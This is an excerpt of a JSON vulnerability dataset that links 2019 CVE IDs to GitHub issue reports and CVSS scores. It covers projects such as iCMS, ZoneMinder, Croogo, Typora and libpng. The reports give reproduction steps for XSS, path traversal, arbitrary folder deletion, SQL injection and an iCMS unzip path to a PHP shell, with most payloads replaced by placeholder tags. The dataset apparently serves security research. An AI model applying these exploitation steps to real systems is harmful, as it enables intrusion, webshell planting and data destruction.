  43506. "description": "division by zero in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A crafted input will lead to \u2019division by zero\u2018 in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a Triggered by APITAG Poc FILETAG The gdb information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43508. "severity": "MEDIUM",
  43509. "baseScore": 6.5,
  43510. "impactScore": 3.6,
  43511. "exploitabilityScore": 2.8
  43512. },
  43513. {
  43514. "CVE_ID": "CVE-2019-7160",
  43515. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/50",
  43516. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/50",
  43517. "Repo_new": "idreamsoft/iCMS",
  43518. "Issue_Created_At": "2019-01-29T07:59:19Z",
  43519. "description": "iCMS NUMBERTAG unzip vulnerability GET SHELL. in FILETAG ERRORTAG and see the FILETAG ERRORTAG so we can use ../ to write a package file to anyother folder in the server\u3002 fitst use this request to write a package file with a php file in it FILETAG FILETAG see FILETAG ERRORTAG and than use this request to unzip this package FILETAG so we upload a php file FILETAG author by ji. EMAILTAG .cn",
  43520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43521. "severity": "CRITICAL",
  43522. "baseScore": 9.8,
  43523. "impactScore": 5.9,
  43524. "exploitabilityScore": 3.9
  43525. },
  43526. {
  43527. "CVE_ID": "CVE-2019-7164",
  43528. "Issue_Url_old": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
  43529. "Issue_Url_new": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
  43530. "Repo_new": "sqlalchemy/sqlalchemy",
  43531. "Issue_Created_At": "2019-01-31T18:03:14Z",
  43532. "description": "sql injection via the order_by parameter. MENTIONTAG APITAG through NUMBERTAG and NUMBERTAG through NUMBERTAG b2 allows SQL Injection via the order_by parameter NUMBERTAG exp save the code to local: FILETAG exec code at shell terminal python dal.py APITAG python dal.py APITAG python dal.py 'create_time' the vul happens at fun order_by NUMBERTAG reserved by CVETAG",
  43533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43534. "severity": "CRITICAL",
  43535. "baseScore": 9.8,
  43536. "impactScore": 5.9,
  43537. "exploitabilityScore": 3.9
  43538. },
  43539. {
  43540. "CVE_ID": "CVE-2019-7168",
  43541. "Issue_Url_old": "https://github.com/croogo/croogo/issues/886",
  43542. "Issue_Url_new": "https://github.com/croogo/croogo/issues/886",
  43543. "Repo_new": "croogo/croogo",
  43544. "Issue_Created_At": "2019-01-16T11:58:30Z",
  43545. "description": "Stored XSS in APITAG field Content. Description There's no escape being done before printing out the value of Blog in the Content page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Blog field value. Payload Introduction to ICT ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43546. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43547. "severity": "MEDIUM",
  43548. "baseScore": 4.8,
  43549. "impactScore": 2.7,
  43550. "exploitabilityScore": 1.7
  43551. },
  43552. {
  43553. "CVE_ID": "CVE-2019-7169",
  43554. "Issue_Url_old": "https://github.com/croogo/croogo/issues/888",
  43555. "Issue_Url_new": "https://github.com/croogo/croogo/issues/888",
  43556. "Repo_new": "croogo/croogo",
  43557. "Issue_Created_At": "2019-01-16T12:00:04Z",
  43558. "description": "Stored XSS in APITAG field Main Menu. Description There's no escape being done before printing out the value of Title in the Main Menu page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43560. "severity": "MEDIUM",
  43561. "baseScore": 4.8,
  43562. "impactScore": 2.7,
  43563. "exploitabilityScore": 1.7
  43564. },
  43565. {
  43566. "CVE_ID": "CVE-2019-7170",
  43567. "Issue_Url_old": "https://github.com/croogo/croogo/issues/890",
  43568. "Issue_Url_new": "https://github.com/croogo/croogo/issues/890",
  43569. "Repo_new": "croogo/croogo",
  43570. "Issue_Created_At": "2019-01-16T12:01:39Z",
  43571. "description": "Stored XSS in APITAG field Vocabulary page. Description There's no escape being done before printing out the value of Title in the Vocabulary page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the values to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43573. "severity": "MEDIUM",
  43574. "baseScore": 4.8,
  43575. "impactScore": 2.7,
  43576. "exploitabilityScore": 1.7
  43577. },
  43578. {
  43579. "CVE_ID": "CVE-2019-7171",
  43580. "Issue_Url_old": "https://github.com/croogo/croogo/issues/887",
  43581. "Issue_Url_new": "https://github.com/croogo/croogo/issues/887",
  43582. "Repo_new": "croogo/croogo",
  43583. "Issue_Created_At": "2019-01-16T11:59:19Z",
  43584. "description": "Stored XSS in APITAG field Blocks. Description There's no escape being done before printing out the value of Title in the Blocks page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Title field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43586. "severity": "MEDIUM",
  43587. "baseScore": 4.8,
  43588. "impactScore": 2.7,
  43589. "exploitabilityScore": 1.7
  43590. },
  43591. {
  43592. "CVE_ID": "CVE-2019-7172",
  43593. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/164",
  43594. "Issue_Url_new": "https://github.com/atutor/atutor/issues/164",
  43595. "Repo_new": "atutor/atutor",
  43596. "Issue_Created_At": "2019-01-16T11:55:48Z",
  43597. "description": "Stored XSS in APITAG Name\" field My Account. Description There's no escape being done before printing out the value of Real Name in the My Account page. APITAG version NUMBERTAG Steps to reproduce Navigate to FILETAG & add the below shared payload as the value to the Real Name field. Payload ERRORTAG Visit page FILETAG the payload will be triggered. FILETAG FILETAG",
  43598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43599. "severity": "MEDIUM",
  43600. "baseScore": 6.1,
  43601. "impactScore": 2.7,
  43602. "exploitabilityScore": 2.8
  43603. },
  43604. {
  43605. "CVE_ID": "CVE-2019-7173",
  43606. "Issue_Url_old": "https://github.com/croogo/croogo/issues/889",
  43607. "Issue_Url_new": "https://github.com/croogo/croogo/issues/889",
  43608. "Repo_new": "croogo/croogo",
  43609. "Issue_Created_At": "2019-01-16T12:01:11Z",
  43610. "description": "Stored XSS in APITAG field Attachment page. Description There's no escape being done before printing out the value of Title in the Attachment page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload webappumldeploy ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43611. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43612. "severity": "MEDIUM",
  43613. "baseScore": 4.8,
  43614. "impactScore": 2.7,
  43615. "exploitabilityScore": 1.7
  43616. },
  43617. {
  43618. "CVE_ID": "CVE-2019-7175",
  43619. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1450",
  43620. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1450",
  43621. "Repo_new": "imagemagick/imagemagick",
  43622. "Issue_Created_At": "2019-01-17T02:37:57Z",
  43623. "description": "memory leak in APITAG in coders/pcd.c different from NUMBERTAG and NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/pcd.c, which is different from NUMBERTAG and NUMBERTAG Steps to Reproduce APITAG columns NUMBERTAG i++) { APITAG length=(sum NUMBERTAG ff NUMBERTAG APITAG ) APITAG //line NUMBERTAG sizeof( pcd_table[i])); if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG ERRORTAG //line NUMBERTAG image >filename); } r=pcd_table[i]; for (j NUMBERTAG j APITAG length=(unsigned int) (sum NUMBERTAG ff NUMBERTAG if (r >length NUMBERTAG line NUMBERTAG buffer=(unsigned char ) APITAG APITAG //line NUMBERTAG APITAG r >sequence=(unsigned int) (sum NUMBERTAG ffff) APITAG key=(unsigned char) (sum NUMBERTAG ff); r >mask NUMBERTAG U NUMBERTAG r >length NUMBERTAG r++; } pcd_length[i]=(size_t) length; } ERRORTAG c if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG filename); } if (r >length NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  43624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43625. "severity": "HIGH",
  43626. "baseScore": 7.5,
  43627. "impactScore": 3.6,
  43628. "exploitabilityScore": 3.9
  43629. },
  43630. {
  43631. "CVE_ID": "CVE-2019-7233",
  43632. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/6",
  43633. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/6",
  43634. "Repo_new": "uvoteam/libdoc",
  43635. "Issue_Created_At": "2019-01-30T01:57:15Z",
  43636. "description": "Segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A parameter which do not exist will lead to Segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a Triggered by APITAG Poc ./doc2txt APITAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43637. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43638. "severity": "HIGH",
  43639. "baseScore": 8.8,
  43640. "impactScore": 5.9,
  43641. "exploitabilityScore": 2.8
  43642. },
  43643. {
  43644. "CVE_ID": "CVE-2019-7235",
  43645. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/52",
  43646. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/52",
  43647. "Repo_new": "idreamsoft/iCMS",
  43648. "Issue_Created_At": "2019-01-30T06:40:33Z",
  43649. "description": "iCMS NUMBERTAG can delete any folder. first use URLTAG to change parameter _app to /../ ,for example we create a folder named test and changes _app to /../test FILETAG FILETAG in PATHTAG ERRORTAG in PATHTAG ERRORTAG nd when we request URLTAG to uninstall this app the $appdir is PATHTAG we can delete the test folder FILETAG FILETAG now the test is deleted FILETAG if we use ../ to change the parameter _app \uff0cwe can delete any folder author by ji. EMAILTAG .cn",
  43650. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  43651. "severity": "HIGH",
  43652. "baseScore": 7.5,
  43653. "impactScore": 3.6,
  43654. "exploitabilityScore": 3.9
  43655. },
  43656. {
  43657. "CVE_ID": "CVE-2019-7236",
  43658. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/53",
  43659. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/53",
  43660. "Repo_new": "idreamsoft/iCMS",
  43661. "Issue_Created_At": "2019-01-30T07:16:00Z",
  43662. "description": "iCMS NUMBERTAG Directory Traversal. in PATHTAG ERRORTAG in PATHTAG ERRORTAG FILETAG chang dir to ../ FILETAG we can traver any floder in the server FILETAG author by ji. EMAILTAG .cn",
  43663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  43664. "severity": "HIGH",
  43665. "baseScore": 7.5,
  43666. "impactScore": 3.6,
  43667. "exploitabilityScore": 3.9
  43668. },
  43669. {
  43670. "CVE_ID": "CVE-2019-7250",
  43671. "Issue_Url_old": "https://github.com/davidrthorn/cross_reference/issues/32",
  43672. "Issue_Url_new": "https://github.com/davidrthorn/cross_reference/issues/32",
  43673. "Repo_new": "davidrthorn/cross_reference",
  43674. "Issue_Created_At": "2019-01-30T16:04:38Z",
  43675. "description": "Stored XSS vulnerability in preview boxes via label and references text. Overall description A stored XSS vulnerability in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary javascript code (via script tags, event handlers, etc.). Since the code is stored by the plugin, the attacker may be able to target anyone that open the configuration panel of the plugin. Steps to reproduce NUMBERTAG Create a new document with the plugin enabled NUMBERTAG Either leave selected the current category, or create a new one NUMBERTAG In either the label text box or the references text box (or both if you prefer) insert one of the following codes: APITAG ERRORTAG NUMBERTAG Press APITAG and apply NUMBERTAG Now, when the victim open the configuration panel and select the category of the step NUMBERTAG a popup will appear. Categories are shown in alphabetical order, so if the chosen one in step NUMBERTAG is the first to be shown, the victim does not even need to select it to be affected. Please note that examples proposed are only for demonstration. An attacker may inject arbitrary harmful javascript code. Resolution You need to escape any html tag from within the preview box in the configuration panel. Additional information A CVE ID request have been submitted. The issue will be updated with the actual number asap.",
  43676. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43677. "severity": "MEDIUM",
  43678. "baseScore": 6.1,
  43679. "impactScore": 2.7,
  43680. "exploitabilityScore": 2.8
  43681. },
  43682. {
  43683. "CVE_ID": "CVE-2019-7295",
  43684. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2129",
  43685. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2129",
  43686. "Repo_new": "typora/typora-issues",
  43687. "Issue_Created_At": "2019-01-25T16:06:05Z",
  43688. "description": "A XSS with resultant remote command execution when Typora rendering Mathematical formula. When open the document with the following content,it will execute commands. version NUMBERTAG APITAG ERRORTAG version NUMBERTAG ERRORTAG The Linux and Mac version are also affected.",
  43689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43690. "severity": "MEDIUM",
  43691. "baseScore": 6.1,
  43692. "impactScore": 2.7,
  43693. "exploitabilityScore": 2.8
  43694. },
  43695. {
  43696. "CVE_ID": "CVE-2019-7296",
  43697. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2131",
  43698. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2131",
  43699. "Repo_new": "typora/typora-issues",
  43700. "Issue_Created_At": "2019-01-26T09:10:47Z",
  43701. "description": "The XSS vulnerability when rendering Mathematical formula inline.. The new version APITAG only fixed the vulnerability when rendering mathematical formula in block. However the when rendering inline also has this problem,so the new poc: $ APITAG APITAG APITAG $",
  43702. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43703. "severity": "MEDIUM",
  43704. "baseScore": 6.1,
  43705. "impactScore": 2.7,
  43706. "exploitabilityScore": 2.8
  43707. },
  43708. {
  43709. "CVE_ID": "CVE-2019-7317",
  43710. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/275",
  43711. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/275",
  43712. "Repo_new": "glennrp/libpng",
  43713. "Issue_Created_At": "2019-01-26T00:53:09Z",
  43714. "description": "Use after free . We ran some tests on an older version of libpng and found a use after free bug while running one the test cases. It looks like the bug is still there in the latest code. Here's the output from our tool DTS_MSG: Stensal DTS detected a fatal program error! DTS_MSG: Continuing the execution will cause unexpected behaviors, abort! DTS_MSG: Access the memory block that is freed. DTS_MSG: Diagnostic information: APITAG Caution: the allocation info is correct only if the freed memory is not reused. the memory block (start NUMBERTAG ffb NUMBERTAG c, size NUMBERTAG bytes) was allocated at PATHTAG NUMBERTAG Stack trace (most recent call first NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG DTS_MSG: [PRO] This detection can be configured with APITAG DTS_MSG: [PRO] but it's not recommanded to change to warning or disabled. Basically, APITAG calls png_safe_execute(image, png_image_free_function, image). In png_safe_execute you have the following code: ERRORTAG When result is NUMBERTAG image is freed, but then image >opaque >error_buf is assigned directly after.",
  43715. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43716. "severity": "MEDIUM",
  43717. "baseScore": 5.3,
  43718. "impactScore": 3.6,
  43719. "exploitabilityScore": 1.6
  43720. },
  43721. {
  43722. "CVE_ID": "CVE-2019-7325",
  43723. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2450",
  43724. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2450",
  43725. "Repo_new": "zoneminder/zoneminder",
  43726. "Issue_Created_At": "2019-01-24T19:31:01Z",
  43727. "description": "Reflected Site Scripting(XSS) Multiple ($_SERVER['PHP_SELF NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug There exists XSS in multiple views as it insecurely utilizes APITAG , that is without applying any proper filtration All the view files available under PATHTAG are vulnerable, expect few listed below. PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43728. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43729. "severity": "MEDIUM",
  43730. "baseScore": 6.1,
  43731. "impactScore": 2.7,
  43732. "exploitabilityScore": 2.8
  43733. },
  43734. {
  43735. "CVE_ID": "CVE-2019-7326",
  43736. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2452",
  43737. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2452",
  43738. "Repo_new": "zoneminder/zoneminder",
  43739. "Issue_Created_At": "2019-01-24T19:44:53Z",
  43740. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view console , insecurely prints the Host value on the webpage, without applying any proper filtration, leading to Self stored XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the URLTAG Inject the XSS payload into the Host Name field. Navigate to the affected URL, payload will be triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43741. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43742. "severity": "MEDIUM",
  43743. "baseScore": 6.1,
  43744. "impactScore": 2.7,
  43745. "exploitabilityScore": 2.8
  43746. },
  43747. {
  43748. "CVE_ID": "CVE-2019-7327",
  43749. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2447",
  43750. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2447",
  43751. "Repo_new": "zoneminder/zoneminder",
  43752. "Issue_Created_At": "2019-01-24T19:18:03Z",
  43753. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43754. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43755. "severity": "MEDIUM",
  43756. "baseScore": 6.1,
  43757. "impactScore": 2.7,
  43758. "exploitabilityScore": 2.8
  43759. },
  43760. {
  43761. "CVE_ID": "CVE-2019-7329",
  43762. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2446",
  43763. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2446",
  43764. "Repo_new": "zoneminder/zoneminder",
  43765. "Issue_Created_At": "2019-01-24T19:14:11Z",
  43766. "description": "Reflected Cross Site Scripting (XSS) Multiple ($_SERVER['PHP_SELF']). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The form action on the multiple views utilizes APITAG insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration would lead to an reflected XSS. To Reproduce Affected URL : FILETAG \"> APITAG ?view=monitor Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Expected behavior Proper escaping of special characters. Debug Logs None",
  43767. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43768. "severity": "MEDIUM",
  43769. "baseScore": 6.1,
  43770. "impactScore": 2.7,
  43771. "exploitabilityScore": 2.8
  43772. },
  43773. {
  43774. "CVE_ID": "CVE-2019-7330",
  43775. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2448",
  43776. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2448",
  43777. "Repo_new": "zoneminder/zoneminder",
  43778. "Issue_Created_At": "2019-01-24T19:22:37Z",
  43779. "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the show parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL(with valid fid,eid), Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43780. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43781. "severity": "MEDIUM",
  43782. "baseScore": 6.1,
  43783. "impactScore": 2.7,
  43784. "exploitabilityScore": 2.8
  43785. },
  43786. {
  43787. "CVE_ID": "CVE-2019-7332",
  43788. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2442",
  43789. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2442",
  43790. "Repo_new": "zoneminder/zoneminder",
  43791. "Issue_Created_At": "2019-01-24T17:17:24Z",
  43792. "description": "Reflected Cross Site Scripting (XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the eid APITAG ID) on the webpage without applying any proper filtration, leading to an XSS issue. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43793. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43794. "severity": "MEDIUM",
  43795. "baseScore": 6.1,
  43796. "impactScore": 2.7,
  43797. "exploitabilityScore": 2.8
  43798. },
  43799. {
  43800. "CVE_ID": "CVE-2019-7333",
  43801. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2441",
  43802. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2441",
  43803. "Repo_new": "zoneminder/zoneminder",
  43804. "Issue_Created_At": "2019-01-24T17:06:53Z",
  43805. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the Exportfile parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43807. "severity": "MEDIUM",
  43808. "baseScore": 6.1,
  43809. "impactScore": 2.7,
  43810. "exploitabilityScore": 2.8
  43811. },
  43812. {
  43813. "CVE_ID": "CVE-2019-7334",
  43814. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2443",
  43815. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2443",
  43816. "Repo_new": "zoneminder/zoneminder",
  43817. "Issue_Created_At": "2019-01-24T18:42:31Z",
  43818. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view export , while exporting an event file, prints the Exportfile name of the webpage without applying any proper filtration, leading to an XSS issue To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43819. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43820. "severity": "MEDIUM",
  43821. "baseScore": 6.1,
  43822. "impactScore": 2.7,
  43823. "exploitabilityScore": 2.8
  43824. },
  43825. {
  43826. "CVE_ID": "CVE-2019-7335",
  43827. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2453",
  43828. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2453",
  43829. "Repo_new": "zoneminder/zoneminder",
  43830. "Issue_Created_At": "2019-01-24T19:52:38Z",
  43831. "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view log , insecurely prints the Log Message value on the webpage without applying any proper filtration, leading to XSS. Example Attacker can entice the victim visit an non existing view (using XSS payload instead of a valid view), the non existing view will be reflected back in the logs, thereby triggering the XSS payload. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to any URL, which reflects back the user supplied input into the logs view ( URLTAG Navigate to the affected link, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43833. "severity": "MEDIUM",
  43834. "baseScore": 6.1,
  43835. "impactScore": 2.7,
  43836. "exploitabilityScore": 2.8
  43837. },
  43838. {
  43839. "CVE_ID": "CVE-2019-7336",
  43840. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2457",
  43841. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2457",
  43842. "Repo_new": "zoneminder/zoneminder",
  43843. "Issue_Created_At": "2019-01-24T20:09:34Z",
  43844. "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Multiple views include the view APITAG , being the file where the vulnerable code exists. The view APITAG contains a filter form, where it takes in input from the user & saves it into the session, in order to preserve & retrieve it later (insecurely). The value of APITAG & Source parameter are being displayed without any output filtration being applied. To Reproduce Multiple Views FILETAG example ) Affected URL : URLTAG \"> APITAG APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43846. "severity": "MEDIUM",
  43847. "baseScore": 6.1,
  43848. "impactScore": 2.7,
  43849. "exploitabilityScore": 2.8
  43850. },
  43851. {
  43852. "CVE_ID": "CVE-2019-7337",
  43853. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2456",
  43854. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2456",
  43855. "Repo_new": "zoneminder/zoneminder",
  43856. "Issue_Created_At": "2019-01-24T20:03:05Z",
  43857. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view events , insecurely displays the limit parameter value, without applying any proper output filtration leading to XSS. This issue exists because of function APITAG in ERRORTAG which insecurely returns the value of limit query string parameter without applying any filtration. To Reproduce Affected URL : URLTAG \"> APITAG &page NUMBERTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43858. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43859. "severity": "MEDIUM",
  43860. "baseScore": 4.8,
  43861. "impactScore": 2.7,
  43862. "exploitabilityScore": 1.7
  43863. },
  43864. {
  43865. "CVE_ID": "CVE-2019-7338",
  43866. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2454",
  43867. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2454",
  43868. "Repo_new": "zoneminder/zoneminder",
  43869. "Issue_Created_At": "2019-01-24T19:56:02Z",
  43870. "description": "Self Stored Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view group , insecurely displays the Group name , that is without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL, Inject the XSS payload into the Name field (window will be closed). Now on the current window, click on the group name, popup will be opened & XSS payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43872. "severity": "MEDIUM",
  43873. "baseScore": 6.1,
  43874. "impactScore": 2.7,
  43875. "exploitabilityScore": 2.8
